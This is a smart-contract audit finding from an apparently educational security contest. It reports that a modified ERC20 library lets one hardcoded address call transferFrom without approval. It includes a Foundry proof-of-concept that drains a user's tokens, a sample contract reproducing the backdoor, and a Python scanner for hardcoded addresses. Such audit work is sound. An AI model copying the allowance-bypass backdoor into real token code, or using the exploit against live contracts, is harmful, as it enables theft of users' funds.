Severity: high
Valid

South Pole Elves can steal all tokens

Summary

The modified implementation of ERC20 used in the protocol allows the elves to steal user tokens at any time without requiring approval.

Vulnerability Details

For some reason, the elves have altered the ERC20 implementation so that their address can call transferFrom on any holder's balance with an allowance of zero, granting themselves excessive power within the protocol.

Impact

Users can be deprived of their gifts.

POC

function testSuspiciousAddress() external {
    // The elves' wallet address.
    address Elves = 0x815F577F1c1bcE213c012f166744937C889DAF17;

    // Mint to the user six times as the SantasList contract.
    vm.startPrank(address(santasList));
    santaToken.mint(user);
    santaToken.mint(user);
    santaToken.mint(user);
    santaToken.mint(user);
    santaToken.mint(user);
    santaToken.mint(user);
    vm.stopPrank();
    assertEq(santaToken.balanceOf(user), 6e18);

    // The user never approved the Elves address.
    uint256 allowance = santaToken.allowance(user, Elves);
    assertEq(allowance, 0);

    // transferFrom still succeeds and moves the user's whole balance.
    vm.startPrank(Elves);
    santaToken.transferFrom(user, Elves, 6e18);
    vm.stopPrank();
    assertEq(santaToken.balanceOf(user), 0);
}

Tools Used

Foundry

Recommendations

Deal with the vulnerabilities introduced by the elves by reverting the ERC20 implementation to its standard form. Consider disciplinary actions for the elves involved.
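
A dependency check that would surface this kind of change before deployment, as an added example that is not part of the original submission or the project's code: it scans Solidity source for hardcoded 20-byte address literals and reports the function that contains each one. The embedded contract is a constructed sample, not the actual solmate-bad source; only the address is taken from the POC above.

```python
import re

# Constructed sample, NOT the actual solmate-bad source: a transferFrom whose
# allowance check is skipped for one hardcoded caller (address from the POC).
SAMPLE_ERC20 = '''\
contract ERC20 {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    // spender 0x0000000000000000000000000000000000000000 is only in a comment
    function transferFrom(address from, address to, uint256 amount) public returns (bool) {
        if (msg.sender != 0x815F577F1c1bcE213c012f166744937C889DAF17) {
            allowance[from][msg.sender] -= amount;
        }
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}
'''

# Exactly 40 hex digits after 0x, so bytes32 and other longer literals are ignored.
ADDRESS = re.compile(r"(?<![0-9A-Za-z])0x[0-9a-fA-F]{40}(?![0-9A-Za-z])")
FUNCTION = re.compile(r"\bfunction\s+(\w+)")
COMMENT = re.compile(r"//[^\n]*|/\*.*?\*/", re.S)


def strip_comments(source):
    """Blank out comments but keep newlines so line numbers stay valid."""
    return COMMENT.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), source)


def find_address_literals(source):
    """Return (line, enclosing_function, address) for each hardcoded address."""
    findings, current = [], None
    for number, line in enumerate(strip_comments(source).splitlines(), 1):
        match = FUNCTION.search(line)
        if match:
            current = match.group(1)
        for address in ADDRESS.findall(line):
            findings.append((number, current, address))
    return findings


if __name__ == "__main__":
    for line, function, address in find_address_literals(SAMPLE_ERC20):
        print(f"line {line}: {address} hardcoded in {function}()")
```

Run it over vendored dependency sources (for a Foundry project, typically the lib/ directory) and review every hit; fuzzing the spender address will practically never land on a single hardcoded value.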

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88
